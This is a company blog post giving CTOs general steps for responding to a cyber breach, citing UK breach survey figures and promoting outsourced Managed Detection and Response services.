Back to Blog
3 Dec 2022

You’re the CTO, you’ve had a cyber breach. What now?

As tech leader, you will be no stranger to the threat of a cyber breach. You’ll be aware of the types of attack and the dangers they pose. Business continuity, your customers and, almost certainly, the reputation of your department and organisation will all be impacted.

Chances are you’ll have an array of policies and precautions in place. Your staff are well trained; your firewalls, systems and software are fully up-to-date with all the latest patches. You have installed the newest antivirus, intrusion detection and endpoint protection, admin rights, password and login policies in the face of increased remote working. You may already have cyber security insurance. And you’ll have ensured your data is backed up, should the worst happen.

And will the worst happen?

Highly likely. 39% of UK businesses were subject to at least one cyber attack they knew about in 2022*. Of these, the most common (83%) was a phishing attack. The remainder were more sophisticated attacks, such as denial of service, malware, or ransomware attack.


IT execs: "Cyber attacks on my organisation are an issue because..."

Over 35% of these businesses experienced some form of operational impact. That included making detailed reports and provisions for tighter security, diverting staff from other tasks, repair and recovery costs.

It also included loss of goods or services, loss of reputation, revenue or share value. Add customer complaints and compensation, fines, legal costs and ransoms, and it all becomes a headache.

Our own research shows that disruption to operations was the biggest issue for tech executives after a cyber attack. Just the ability to serve customers or for staff to complete projects. Note that the cost of ransom and repair was ranked fourth.

For businesses that reported a material outcome after a cyber attack, nearly 40% took over 24hrs to recover, and 8% took up to a week.*

Assuming the worst has happened, what should you do?

You should already have a clear plan for responding to a cyber breach. Your staff should be trained, regularly updated, aware of your policies and given a clear roadmap in case of a breach.

    1. Contain the breach and limit the damage. Disconnect your internet and disable remote access. Establish which systems have been infected or hacked, and contain them immediately. That doesn’t mean deleting data, and you must preserve any logs.
    2. You need to prevent a future attack, and the breach could have implications for regulation, loss of customer data and potential litigation. It may become necessary to present formal evidence following the threat resolution.
    3. Determine the nature of the breach. Check security logs, firewalls and emails. Your antivirus program or intrusion detection system should have some clues. Who had access to the infected servers? Which network connections were active at the time?
    4. Establish the scope of the breach. What data has been compromised – addresses, email accounts, passwords, credit cards? Is it just your business? Has it affected your customers, suppliers or partner businesses? Who needs to be notified, and how quickly? You will probably have to write a report and may be subject to litigation if you have not taken appropriate steps on time.
    5. If you have cyber liability insurance, notify your provider, they may also be able to help with post-event forensics.
    6. Reboot. Assuming you have established the nature of the breach and rectified the parts of your infrastructure that allowed the breach, you can start to put your systems back online. Notify all affected parties and change passwords and access privileges as appropriate.
    7. Think about restricting the number of people who have access to the infected systems to prevent similar breaches from happening again. Prepare reports and examine which equipment or policy changes could limit the chances of a similar event in the future.

Consider a Managed Detection and Response (MDR) service. 58% of small firms and 55% of medium businesses now outsource their IT and cyber security to an external supplier*. Organisations cited access to more significant expertise, advanced resources, and higher cyber security standards.

Outsourcing cybersecurity to an MSP

MDRs are becoming an invaluable third-party asset to businesses of all sizes from every sector. These outsourced cybersecurity solutions can detect and fight threats that your security infrastructure may not have the resources or the skills to handle. And most MDR platforms provide 24/7 protection, including cloud-based security solutions for organisations struggling to host their own comprehensive security department.

MDR services combine all aspects of a cybersecurity plan into one managed control centre. They maximise the effectiveness of threat monitoring and response without increasing internal resources. They reduce the need for security up-skilling and provide protection against emerging threats (some known and some unknown).

MDR services can also be provided on a monthly contract basis, streamlining your IT budget and avoiding the cost spikes and fiscal black holes that upgrades, staff churn and event response can cause.

Before you upgrade your cyber security infrastructure, consider how outsourcing to an MDR might help you maintain the end-to-end protection you need to maximise secure your business and avoid the pitfalls of a cyber breach.

*Figures sourced from Gov.UK Cyber Security Breaches Survey 2022

Graham Smith

By Graham Smith